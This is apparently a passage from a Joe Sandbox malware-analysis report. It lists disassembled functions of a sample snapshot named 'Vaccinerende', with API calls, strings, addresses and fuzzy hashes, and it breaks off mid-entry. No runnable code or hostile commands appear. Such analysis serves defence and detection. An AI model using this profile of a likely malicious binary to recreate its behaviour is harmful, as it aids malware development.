                                            Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                            • GetLastError.KERNEL32 ref: 004175A2
                                            • GetLastError.KERNEL32 ref: 004175A8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FilePointer
                                            • String ID:
                                            • API String ID: 1156039329-0
                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                            Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleTime
                                            • String ID:
                                            • API String ID: 3397143404-0
                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                            Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Temp$DirectoryFileNamePathWindows
                                            • String ID:
                                            • API String ID: 1125800050-0
                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                            Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                            • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CloseHandleSleep
                                            • String ID: }A
                                            • API String ID: 252777609-2138825249
                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                            Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.MSVCRT ref: 00409A10
                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                            • free.MSVCRT ref: 00409A31
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpy
                                            • String ID:
                                            • API String ID: 3056473165-0
                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                            Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d
                                            • API String ID: 0-2564639436
                                            • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                            • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                            Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: BINARY
                                            • API String ID: 2221118986-907554435
                                            • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                            • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                            Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID: /stext
                                            • API String ID: 2081463915-3817206916
                                            • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                            • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                            Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                            • String ID:
                                            • API String ID: 2445788494-0
                                            • Opcode ID: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                            • Opcode Fuzzy Hash: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                            Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: malloc
                                            • String ID: failed to allocate %u bytes of memory
                                            • API String ID: 2803490479-1168259600
                                            • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                            • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                            • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                            • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                            Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0041BDDF
                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcmpmemset
                                            • String ID:
                                            • API String ID: 1065087418-0
                                            • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                            • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                            Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                            • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                            • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                              • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                              • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                            • String ID:
                                            • API String ID: 1381354015-0
                                            • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                            • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                            Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                            Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                            • String ID:
                                            • API String ID: 2154303073-0
                                            • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                            • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                            Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 3150196962-0
                                            • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                            • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                            Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$PointerRead
                                            • String ID:
                                            • API String ID: 3154509469-0
                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                            Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                            • String ID:
                                            • API String ID: 4232544981-0
                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                            Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                            Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
